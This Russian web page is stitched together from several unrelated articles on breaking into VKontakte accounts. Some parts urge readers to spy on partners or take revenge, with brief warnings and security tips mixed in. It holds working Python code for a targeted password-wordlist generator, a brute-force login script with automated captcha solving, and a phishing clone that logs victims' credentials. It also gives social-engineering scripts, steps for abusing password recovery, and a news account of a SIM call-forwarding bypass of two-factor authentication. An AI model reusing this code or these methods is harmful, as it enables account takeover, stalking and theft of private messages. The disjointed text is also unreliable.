Что делать если взломали страницу в ВК: инструкция для пострадавших

Социальные сети не являются примером безопасности. Проникнуть в личную жизнь каждого человека довольно-таки просто. Сегодня мы именно об этом и поговорим: расскажем, как взломать страницу в ВК и как от этого можно защититься.

image

Зачем это нужно?

Зачастую бывает такое, что мы специально ищем информацию о том, как можно взломать страницу ВК. У каждого на это есть свои причины, но результат, как всегда, один и тот же. Чаще всего это нужно людям, которые пытаются подловить свою вторую половинку на лжи или измене, ведь это хороший способ узнать всю правду из первых уст. Также взлом страницы может быть своеобразной местью человеку за что-то или возможностью напакостить. В общем, у каждого свои цели, но путь достижения один и тот же.

image

С помощью наличия электронной почты

На сегодняшний день каждая страница в социальной сети закрепляет за собой либо номер телефона, либо адрес электронной почты. Это и является своеобразным минусом, но в то же время плюсом для тех, кто знает, как этим воспользоваться. Давайте же об этом поговорим. Весь фокус состоит в том, что, зная номер телефона или электронную почту, к которым прикреплена страница, другой человек может попытаться возобновить доступ к странице в связи с якобы забытым паролем. Вся эта процедура не займет и двадцати минут, но при этом вы получите полный доступ к странице своего знакомого. Мало того, вы не только получите доступ к аккаунту, но также измените его пароль, уже не дав возможности подлинному хозяину возобновиться. А суть взлома состоит в следующем. После ввода электронной почты (логин) вы нажимаете на кнопку «Восстановление пароля». Затем поочередно заполняете все следующие ячейки согласно данным, которыми вы обладаете. Проблемы могут возникнуть в том месте процесса, где будет необходимо ответить на личный вопрос, но если вы хорошо знакомы с человеком, то здесь нет крайней сложности. Кроме того, для получения кода подтверждения вам понадобится телефон хозяина страницы. Здесь нужно проявить изобретательность, попросив, например, позвонить, или взять незаметно, пока человек находится в другой комнате. Таким образом, этот вариант подойдет только тем, кто находится в тесных отношениях с объектом.

Дополнительные программы

Помимо двух вышеперечисленных способов существует множество программ, которые могут блокировать страницы в социальных сетях и таким образом помогают ответить на вопрос о том, как взломать страницу в ВК. Чаще всего это специальные дайджесты, работающие в онлайн-режиме. Услуги таковых серверов могут быть как платными, так и бесплатными, но выбирать их следует как можно внимательнее. Большинство из них могут быть пиратскими ловушками, которые взломают не только чужой, но и ваш аккаунт, так что мы бы не советовали вам пользоваться подобными программами. Но если у вас все же есть на это некоторые причины, то выбирайте взломную систему весьма тщательно. Почитайте о ней отзывы, а также общую информацию о том, каким образом данная программа работает. Если сервер предоставляет обратную связь с производителем или тем, кто ее распространяет, разузнайте все детали и нюансы, которые могут возникнуть в ходе ее работы. Но нужно помнить, что все может быть не так просто, как вам кажется.

УК РФ

Как бы вы ни хотели взломать чужую страницу — делать этого не стоит. Во-первых, это аморально. Во-вторых, это может грозить штрафом и даже лишением свободы до пяти лет согласно статье 272 Уголовного кодекса Российской Федерации, предусматривающей наказание за неправомерный доступ к компьютерной информации.

Можно ли уберечься от взлома?

Увы, но гарантии того, что вас не взломают, нет. Это может произойти в любой момент и чаще всего тогда, когда вы даже об этом не догадываетесь. Возможно, даже сейчас, когда вы читаете эту статью, кто-то изучает вашу личную переписку. Но все же некий способ уберечься есть. Во-первых, если есть возможность, то создайте новую электронную почту, которую будете знать только вы, и именно к ней «привяжите» свой аккаунт. Во-вторых, в качестве пароля выбирайте что-то неординарное, что не имеет прямого касательства к вам и вашей жизни. В-третьих, желательно не пользоваться чужими компьютерами и телефонами, чтобы открывать свой аккаунт. В-четвертых, не сохраняйте файлы и документы из Сети, если не уверенны в их «чистоте». В-пятых, установите хороший антивирус, который постоянно будет находиться в режиме работы. Но даже если вы будете старательно придерживаться данных правил, это не дает гарантии на все 100%. Значительно проще будет изначально смириться с вариантом того, что, быть может, со временем вашу страницу взломают.

Подведем итоги

Прочитав эту статью, вы уже знаете о том, как взломать страницу в ВК, какие способы для этого существуют и как можно от этого защититься. Давайте еще раз все повторим. Итак, взломать страницу в ВК можно двумя способами: зная электронный адрес и телефон, к которым она привязана, и доступ к этому телефону, а также благодаря специальным программам, работающим в онлайн-режиме. Также вы знаете пять способов, которые хоть как-то защитят ваш аккаунт от взлома. А если использовать их все одновременно, то избежать неприятности можно весьма на длительное время. Но наш вам совет – лучше всего удаляйте переписку и не храните в альбомах компромат на себя и на своих друзей.

Социальные сети прочно вошли в нашу жизнь. А желание взломать чужую страничку «ВКонтакте» сродни подглядыванию в замочную скважину соседа — нельзя, но очень интересно. В интернете описано огромное количество способов получения логина и пароля к другим аккаунтам, но многие из них лишь создают угрозу для вашего компьютера.

1Сначала нужно обязательно заметить, что взлом личной страницы другого человека — незаконное действие. За это предусмотрено даже уголовное наказание. Потому лучше все-таки оставить подобную затею. 2Рассмотрим несколько способов, которые могут помочь в этом деле. Один из них — подбор пароля. Поскольку логином «ВКонтакте» является электронный адрес или номер телефона, то узнать его не составит труда. Для пароля же люди чаще всего используют:

  • свою дату рождения;
  • дату рождения кого-то из близких;
  • свой номер телефона;
  • номер телефона родственника или друга;
  • имя или фамилию родственника или друга;
  • имя домашнего животного;
  • несколько букв из верхнего ряда клавиатуры в английской или русской раскладке;
  • самые ленивые просто набирают цифры от 1 до 9 в прямом или обратном порядке.

3Заходим на сайт «ВКонтакте» и пробуем подобрать нужную комбинацию. После нескольких попыток система попросит ввести капчу, и это будет продолжаться до того времени, пока вы не войдете на страницу или не оставите эту затею. 4Наиболее популярным методом взлома страниц «ВКонтакте» можно назвать фишинг. Это создание и запуск сайта, который полностью копирует дизайн оригинального, но имеет небольшое отличие в адресе. Например, не vk.com, а site-vk.com. Авторизуясь на такой мошеннической странице, пользователь оставляет в базе ее владельца свой логин и пароль. 5Следующий способ взломать страницу «ВКонтакте» — вирусы-трояны. Часто в сети можно встретить предложение узнать, кто посещал вашу страницу, или почитать чужую переписку, всего лишь установив небольшую программу. В основном они распространяются бесплатно и имеют огромное количество положительных отзывов от благодарных пользователей. После установки утилита просит ввести логин и пароль от вашего аккаунта. А дальше все эти данные попадают к создателю вируса. 6Последний метод, который мы рассмотрим, называется брут. Это использование специальных программ и скриптов, которые автоматически подбирают логин и пароль к странице. В основном они распространяются платно, но такой способ наименее эффективный, в сравнении с приведенными выше. 7После описания того, как взломать страницу «ВКонтакте», поговорим, как защитить свой аккаунт от мошенников. Для этого есть несколько важных правил. Придумайте сложный пароль, не связанный с известной окружающим информацией, и содержащий более шести знаков — как цифр, так и букв в нижнем и верхнем регистре, различных символов. Для большей безопасности можно подключить авторизацию по коду, который приходит в SMS. 8Установите и используйте на компьютере качественный и проверенный антивирус. Он сразу заблокирует доступ к страницам, которые созданы для фишинга, а также не позволит скачать вам вирус-троян. 9Заходя на сайт «ВКонтакте», внимательно смотрите на его адрес — это должен быть исключительно vk.com. 10Никогда не скачивайте из интернета подозрительные программы, которые требуют авторизации через «ВКонтакте».

Теперь вы знаете, какими способами можно взломать страницу «ВКонтакте». А также сумеете защитить свои собственные данные от мошенников.

4.4 Голосов: 48 Требуется:4.4 и выше Категория:Программы Разработчик:Google Commerce Ltd Язык:Русский Версия:4.502.935 Размер:13M Мб. Дата обновления:11-09-2020

Описание

ВКонтакте Amberfog  (взлом ВК) – неофициальный клиент для работы с социальной сетью ВК. В программе реализованы все функции, имеющиеся в оригинальной версии приложения, а также введено множество дополнительных фишек и опций. Именно из-за последних многие пользователи выбирают сторонние модификации.

Назначение программы

Официальное приложение VK не всегда способно удовлетворить требования пользователей. Например, в нем нет функции «невидимки», настройки интерфейса, дополнительной защиты и так далее. Создатели социальной сети не запрещают сторонним разработчикам создавать альтернативные варианты, в которых все перечисленные и многие другие опции доступны бесплатно. Именно таким модом и является ВКонтакте Amberfrog. Вы легко разберетесь в настройках и интерфейсе, если ранее пользовались любым подобным приложением. Создатели постарались адаптировать управление мессенджером и соцсетью для новичков.

Список возможностей

Перечислять функции, доступные в официальной и модифицированной версии ВК мы не будем – о них знает каждый пользователь соцсети. Сделаем акцент на возможностях, которые делают ВКонтакте Amberfrog уникальной программой среди конкурентов:

  • Функция «невидимки». Вы не будете отображаться онлайн при просмотре ленты новостей, сообществ, страниц друзей и так далее. Статус раскрывается только при отправке сообщений.
  • Вечный онлайн. Полная противоположность первой функции. Даже после выхода со страницы ваш статус не будет меняться на оффлайн.
  • Просмотр диалога без прочитывания. Вы можете посмотреть содержимое сообщений, но не помечать их в качестве прочитанных для вашего собеседника.
  • Настройка интерфейса. ВКонтакте Amberfrog предоставляет выбор из более чем 20 разноцветных вариантов, среди которых есть и ночной вариант.
  • Мультиаккаунт. Поддерживается быстрое переключение между личными страницами.
  • Дополнительные средства защиты. Вы можете заблокировать паролем или отпечатком пальца конкретные разделы и вкладки приложения.

Интерфейс программы лишь слегка отличается от оригинального приложения, поэтому у вас уйдет не более 1 минуты на адаптацию в новом мессенджере.

Преимущества и недостатки

Плюсы:

  • интересные дополнительные функции;
  • отличная оптимизация;
  • полностью на русском языке;
  • безопасность личных данных и пароля от страницы;
  • вариативность настройки интерфейса, приватности и уведомлений.

Минусы:

  • не все нововведения соцсети своевременно появляются в любительском клиенте.

Взломанная версия ВКонтакте Amberfrog подразумевает полное отсутствие рекламных вставок и неограниченный доступ ко всем функциям программы. Название

ВКонтакте Amberfog

Скачать ВКонтакте Amberfog (взлом ВК) бесплатно 4.502.935

Полная версия Скачать бесплатно[12.79 Mb] Скачать с Google Play

Скачал мод, взлом или чит? Подпишись и не пропустишь последнюю версию!

Похожие игры или приложения:

4,6 есть мод Kate Mobile для ВКонтакте с кэш аудио Kate Mobile – неофициальный клиент социальной сети ВКонтакте для мобильных устройств. Разработчики были не согласны с функциями и ограничениями в оригинальном приложении, поэтому сделали более 4.0 есть мод Бот Максим на Андроид Бот Максим – мобильное приложение, позволяющее озвучивать набранный текст. Программа работает вкупе с социальной сетью ВКонтакте. Пользователю необходимо напечатать сообщение или скопировать и 4.0 VK MP3 MOD VK MP3 MOD – популярная модификация Вконтакте, которая была разработана для расширения и улучшения функционала классического мобильного клиента. Приложением сможет воспользоваться каждый, т.к. его 4.1 Project Stalker / S.T.A.L.K.E.R. Mobile Project Stalker / S.T.A.L.K.E.R. Mobile – игра для всех, кто мечтал перенести оригинальный Сталкер на телефон или планшет. Теперь побродить по зоне отчуждения можно и на смартфоне – достаточно 4,7 VK Dark Edition VK Dark Edition – популярная модификация на основе официального приложения Вконтакте, выполненная в черных тонах. Функционал данного продукта практически не отличается от возможностей оригинального 4.0 APK Editor Pro APK Editor Pro – специальный инструмент для редактирования любых APK-файлов. С помощью данной программы вы сможете взломать любые установщики приложений и мобильных игр. Таким способом у 4.0 есть мод Grand Theft Auto 5 (GTA 5) Grand Theft Auto 5 – крайняя часть легендарной серии экшена в открытом мире. Пятая игра вновь рассказывает криминальную историю и раскрывает харизматичных персонажей. Кроме того, в ней всегда весело 4.5 MX Player Pro MX Player Pro – универсальный проигрыватель видео и аудио для мобильных устройств на Андроиде. Если вы постоянно воспроизводите ролики, фильмы или музыку, то без единого мультимедийного центра 3,6 есть мод BOOM: музыкальный плеер со взломом BOOM – мобильный плеер для прослушивания песен из социальных сетей ВКонтакте и Одноклассники. С помощью программы пользователи могут сортировать композиции, создавать плейлисты, альбомы и слушать 4,1 RoughAnimator animation app Анимирование на мобильных устройствах еще не так популярно, поскольку пока существующие приложения недостаточно продвинуты для того, чтобы удовлетворить потребности всех пользователей. Однако Отзывы

04 августа 2017 Хакинг 1

В статье приводится несколько возможных способов взлома ВКонтакте, ориентированных на людей, недалёких в компьютерной безопасности.

Иными словами, при взломе будут использоваться не машинные, а человеческие уязвимости. Естественно, приведённые методы не универсальны (и слава богу!), и у кого-то может хватить мозгов на то, чтобы не поддаваться на ваши провокации. Но таких не так уж много, поверьте. Итак, начнём. Прежде всего, перед началом вам понадобятся страница, которую вы собираетесь «хакнуть», свободное время и безопасный доступ к ВКонтакте. Сам процесс взлома разделим на несколько шагов.

Прежде всего, нужно собрать как можно информации со страницы потенциальной жертвы, а именно:

    1. Неплохо было бы заиметь почту цели. Если человек не только попал в сеть, вы сможете найти почту путем простого гугления. К примеру, особо удобно отыскивать почту на mail.ru. Также можно попробовать поискать Ф.И.О. цели и дату рождения. Или же другого рода такие комбинации. Если жертва имеет Мой Мир на mail, то почта будет в коде страницы или же в URL.

      В том случае, когда имеется почта без соц.сети от mail’a, почту можно выяснить, создав себе подставную почту на этом сервисе и поискав в мессенджере от мэйла. Как ещё один из способов, можно попробовать найти что-нибудь дельное с помощью аккаунтов цели в других социальных сетях. Например, попытаться пробить никнеймы из всех найденных аккаунтов по всем известным почтовым сервисам. Как вариант, можно попробовать использовать импорт почтовых контактов и предложение добавить этих людей в друзья. Регистрируем очередную фальшивую почту и получаем дополнительные аккаунты. Как альтернатива, можно попытать счастье, используя форму восстановления в Twitter’е, таким образом узнав часть почты. В FaceBook’е можно напрямую поискать аккаунт, введя почту в поиск.

На данном этапе мы будем пробовать получить доступ к аккаунту цели. Рассмотрим самые простые приёмы:

1) «Социнженер»

Здесь сразу нужно оговориться, что этот способ годиться только для тех, кто мало что знает об интернете, но решил по каким-либо причинам зарегистрироваться в соц.сети. Как правило, это либо старики, либо дети.

Если вы хотите просто попрактиковаться, то новички ВКонтакте могут быть найдены здесь. В данном случае, применяется один из законов психологии: человек, который не разбирается в чем-то, подсознательно доверяет тому, кто более опытен в конкретной области, и принимает его слова на веру. Тут можно создать аккаунт представителя техподдержки, создать «официальную» почту администрации и прочее. И создать какую-нибудь легенду. Что новые пользователи обязаны проходить проверку после регистрации и дать, например, ссылку на некий тест, по итогу или для входа которого требуется логин-пасс от вк. Самое важное, чтобы вы действовали осторожно. Следует убедить пользователя, что он в безопасности. Этот приём хорошо сочетается с фейком. Кроме того, продвинутые социнженеры могут, узнав номер юзера, позвонить (анонимно, используя sip) и развести напрямую. Кроме того, вся указанная вами информация (номер телефона/упоминание фактов с указанием дат/другое) также помогает установить контакт с жертвой и косвенно говорит о том, что вы из техподдержки.

2) «Умный» перебор

Метод, рассчитанный на среднестатистических пользователей. Для него нам надо будет специальный словарь, заточенный под конкретного человека. Давайте разберёмся со структурой нашего словаря:

  • Личные данные. Сюда входят дата рождения (17.11.1992 = 1711, 1992, 17111992), возраст (1992, 2017 = 2017, 1992,  24), имя (Стас = stas, ctac) и фамилия (Иванов = ivanov).
  • Аккаунты из других соц. сетей и почтовые сервисы (twitter.com/stasik_ku , facebook.com/stasss1992, stasss92@mail.ru = stasik_iv, stasss1992, stasss92).
  • Увлечения (футбол, плавание, молодежка = football, swimming, molodejka, molodegka).
#! coding:utf-8  import sys,os  razdel = ['_',':',';']  def uniq(seq):      seen = set()      seen_add = seen.add      return [x for x in seq if not (x in seen or seen_add(x))]    def brute_words(words):      new_words = []        for i in words:          new_words.append(i)          new_words.append(i[0].upper() + i[1:])          new_words.append(i[0].upper() + i[1:-1] + i[-1].upper())          new_words.append(i.upper())        for j in spisok:          new_words.append(i + j)      for m in razdel:          new_words.append(j + m + i)          new_words.append(j + i)          new_words.append(i * 2 + j)          new_words.append(j * 2 + i)          new_words.append(i[0].upper() + i[1:] + j)          new_words.append(i[0].upper() + i[1:-1] + i[-1].upper() + j)       return uniq(new_words)    def generate(words_file):      o = open(words_file, 'r')    words = o.read().splitlines()  for i in brute_words(words):      print(i)    def main():      try:          argv1 = sys.argv[1]          generate(argv1)      except IndexError:          print("Нужно указать файл")      except IOError:          print("Нет такого файла")    if __name__ == "__main__":      main()  

Из 14 получилось 1272 варианта. Приведу часть.

Molodegkactac    MolodegkActac    molodejka_molodegka    Stasss92molodejka    stasss92molodegka    molodegka_stasss92    molodegka:stasss92    molodegka;stasss92    stasss1992swimming    swimming_stasss1992    Kurayginctac    KuraygiNctac    kurayginkuraygin    kuraygin_kuraygin    molodegka17111992    1711199217111992molodegka    molodegkamolodegka17111992    24    1711_24

Отлично, теперь автоматизируем перебор паролей через мобильную версию ВКонтакте небольшим скриптом.

#! coding: utf8  import grab, re, urllib2  from antigate import AntiGate  from grab import GrabTimeoutError  from time import sleep    cap_key = '123 ' #Ваш ключ с Antigate  def anti(key, file): #Получение решения Captcha с Antigate      try:          try:              data = AntiGate(key, file)              return data          except KeyboardInterrupt:              print("Завершение")      except:          anti(key, file)    def save(url, file): #Скачивание файла по URL      site = urllib2.urlopen(url)      f = open(file, 'wb')      f.write(site.read())    def cap_solve(img):      save(img, 'captcha.jpg')      key = anti(cap_key, 'captcha.jpg')      return key    def brute(login, passwords, save):      out = open(save, 'w')      psswrds = open(passwords,'r')            try:          int(login)          prefix = True      except:          prefix = False            g = grab.Grab()      g.go('http://m.vk.com')        for line in psswrds:          psswrd = line.rstrip('rn')          g.doc.set_input('email', login)          g.doc.set_input('pass', psswrd)          g.doc.submit()            if g.doc.text_search(u'captcha'):              all_captchas = re.findall('"(/captcha.php[^"]*)"', g.response.body)[0]              captcha = '' + all_captchas              key = cap_solve(captcha)              g.doc.set_input('email', login)              g.doc.set_input('pass', psswrd)              g.doc.set_input('captcha_key', str(key))              g.doc.submit()              print("cap")              if 'Подтвердить' in g.response.body:                  if prefix:                      prefix1 = g.doc.rex_search('+[0-9]*').group(0)                      prefix2 = g.doc.rex_search(' [0-9]*').group(0)                      pre1 = re.findall('[0-9]{1,}', prefix1)[0]                      pre2 = re.findall('[0-9]{1,}', prefix2)[0]                            login = login.replace(pre1, '')                      login = login.replace(pre2, '')                            g.set_input('code', login)                      g.submit()                      print(login + ':' + psswrd + '--success')                      out.write(login + ':' + psswrd + 'n')                  else:                      out.write(login + ':' + psswrd + 'n')              else:                  if g.doc.rex_search('[^>]+').group(0) == 'Login | VK':                      print(login + ':' + psswrd + '--fail')                  else:                      print(login + ':' + psswrd + '--success')                      out.write(login + ':' + psswrd + 'n')      out.close()      psswrds.close()  

Естественно, пример не оптимизирован. Можно ещё добавить прокси, многопоточность и прочие плюшки, но этим уже сами займётесь, если будет интересно. Зато скрипт способен сам вводить недостающие цифры в защиту ВКонтакте при заходе с другой страны, а также, используя Antigate, запросто вводит Captch’и, появляющиеся после 5-6 попытки ввода с одного IP.

3) «Фейк — наше все»

file --mime-encoding file.html

Затем меняем с исходной на новую

iconv -f iso-8859-1 -t utf-8 file.html > vk2.html

Далее вам нужно создать управление страницей на серверном языке.

@route('/')  def index():      return template('vk2.html')        @route('/Welcome! | VK_files/')  def server_static(filepath):      return static_file(filepath, root='./Welcome! | VK_files/')  

Как выяснилось, на кое-каких файлах порой выдаётся ошибка 404. У нас, к сожалению, не имеется нужных картинок с сайта, так что положим их в отдельную папку images.

mkdir images  cd images  wget  wget ""  wget ""  mkdir icons  cd icons  wget ""  wget ""

Пропишем новый роутинг в скрипте.

@route('/images/')  def server_static(filepath):      return static_file(filepath, root='./images/')
@post('/')  def index():      login = request.forms.get('email')      password = request.forms.get('pass')      print("|Catch|-------------- " + login + ':' + password)      with open("log.txt", "a") as myfile:          myfile.write(login + ':' + password + "n")            return redirect('http://www.vk.com')

В заключении, переносим тег button, что под формой в коде в пределы формы и добавляем свойство type=»submit», и наслаждаемся тем, что всё работает. Для тех, у кого что-то не получилось, представляем архив с готовым решением.

Если вы желаете оптимизировать этот процесс и не хотите прописывать всё это ручками, то можете воспользоваться инструментом SET. (Social Engineer Toolkit).

Другие материалы по теме:

10 лучших ресурсов для изучения хакинга с помощью Kali Linux 5 лучших Android приложений для взлома Wi-Fi сетей 10 лучших инструментов для хакинга в 2017 году

16 января 2019 14:01

Пользователь Habr нашёл способ взломать аккаунт «ВКонтакте», даже если он защищён двухфакторной аутентификацией. Всё, что ему для этого понадобилось, — номер телефона жертвы и его принадлежность к одному определённому оператору связи. Из-за лазеек в политике безопасности компании непосредственный взлом аккаунта занял у программиста всего несколько минут.

Уже несколько лет во «ВКонтакте» доступна функция двухфакторной аутентификации, которая была введена разработчиками, чтобы ещё больше обезопасить страницы пользователей и пабликов от злоумышленников. Её суть в том, что после ввода логина и пароля вас просят ввести ещё и код, отправленный на ваш номер мобильного телефона или сгенерированный в специальном приложении на смартфоне.

Казалось бы, обойти такую систему защиты должно быть очень и очень сложно, но пользователь Habr программист Даниил Андреев доказал обратное. Он произвёл тестовый взлом аккаунта во «ВКонтакте», зная только номер телефона его владельца. Так как каждая купленная официально сим-карта привязывается к паспорту, у мобильных операторов есть данные их клиентов и, как утверждает Андреев, они часто перестают быть конфиденциальными.

Даниил попробовал найти по номеру телефона паспортные данные себя и своих близких в даркнете и обнаружил, что это даже слишком просто.

В моём случае в базе данных крупного салона связи оказались как мои данные, так и данные моей мамы и даже бабушки. Стоимость получения данной информации как раз укладывается в ценник ~500-1000 рублей. Возможно, это выглядит достаточно муторно и проблемно, но по факту это занимает не более получаса, и вряд ли вас кто-то будет после искать и найдёт.

После этого Андреев создал фейковый аккаунт во «Вконтакте», написал с него в официальное сообщество нескольких мобильных операторов, попросив их настроить переадресацию с номера жертвы взлома на принадлежащую ему сим-карту. Всё, что от него потребовал один из операторов, — прежний номер телефона, ФИО его владельца и его паспортные данные. Как раз всю ту информацию, что и оказалась в распоряжении Андреева благодаря даркнету.

Конечно, жертва получит уведомление о переадресации на свой номер телефона, но, как показал опыт Даниила, это может произойти как спустя несколько минут, так и спустя целый час. Но даже за несколько минут хакер уже может получить нужную ему информацию, а если он будет взламывать аккаунт в  четыре часа утра, то его хозяин не сразу отреагирует на пришедшее ему эсэмэс.

Как только Андреев подключил себе услугу переадресации, он приступил непосредственно к взлому аккаунта и попытался сменить пароль. Чтобы подтвердить это действие, «ВКонтакте» выслал эсэмэс с кодом. Оно приходит на телефон жертвы, так как переадресация работает только на звонки, но опять же если делать всё быстро, хозяин взломанного аккаунта не успеет предпринять никаких действий по защите своих данных.

Так как кода Андреев так и не получил, он просит «ВКонтакте» выслать ему ещё одно эсэмэс, и после этого сайт предлагает ему позвонить. Этого как раз пользователю и надо. Робот звонит на номер телефона взломщика, сообщает ему код, с помощью которого хакер меняет пароль. Даже если жертва быстро сменит пароль, Даниил мог бы либо попробовать взломать профиль ещё раз, либо сохранить все её данные к себе на компьютер.

Нет никаких проблем запустить скрипт дампа страницы, который сохранит всю историю переписок, все фотографии и всё, что только душе угодно, за пару секунд.

Единственное, что может помешать претворению описанного плана в жизнь, — отказ оператора настроить переадресацию через чат во «ВКонтакте», и такие операторы были. По правилам одних, переадресация может настраиваться только через сам телефон, другие писали, что переадресацию можно настроить, либо позвонив в колл-центр, либо в личном кабинете. А один оператор и вовсе согласился подключить переадресацию, только если человек лично придёт в салон.

Но куда же без недобросовестных.

Один из пользователей предположил, что оператор, логотип которого Даниил замазал, — «Билайн», и обратился за комментарием в их службу поддержки. Судя по скриншоту пользователя, «Билайн» действительно может установить переадресацию, если клиент просто предоставит паспортные данные даже через чат «ВКонтакте», а чтобы этого не случилось, можно прийти лично в салон и установить универсальный пароль.

Пользователи Habr часто находят уязвимости в системах безопасности различных компаний и сервисов и частенько таким образом помогают людям защитить свои личные данные. Так, совсем необязательно проходить авторизацию через «ВКонтакте», когда вы хотите посмотреть видео на Pornhub. Medialeaks рассказывал о нескольких простых способах остаться анонимным, когда смотрите любимые ролики на сайте.

А причины опасаться за свои личные данные при пользовании Pornhub действительно есть. Согласно официальным заявлениям компании, она не передаёт данные третьим лицам, но в правдивости этих слов можно засомневаться, учитывая особые отношения Pornhub с «ВКонтакте» и Роскомнадзором.

Оцените статью
Рейтинг автора
4,8
Материал подготовил
Максим Коновалов
Наш эксперт
Написано статей
127
А как считаете Вы?
Напишите в комментариях, что вы думаете – согласны
ли со статьей или есть что добавить?
Добавить комментарий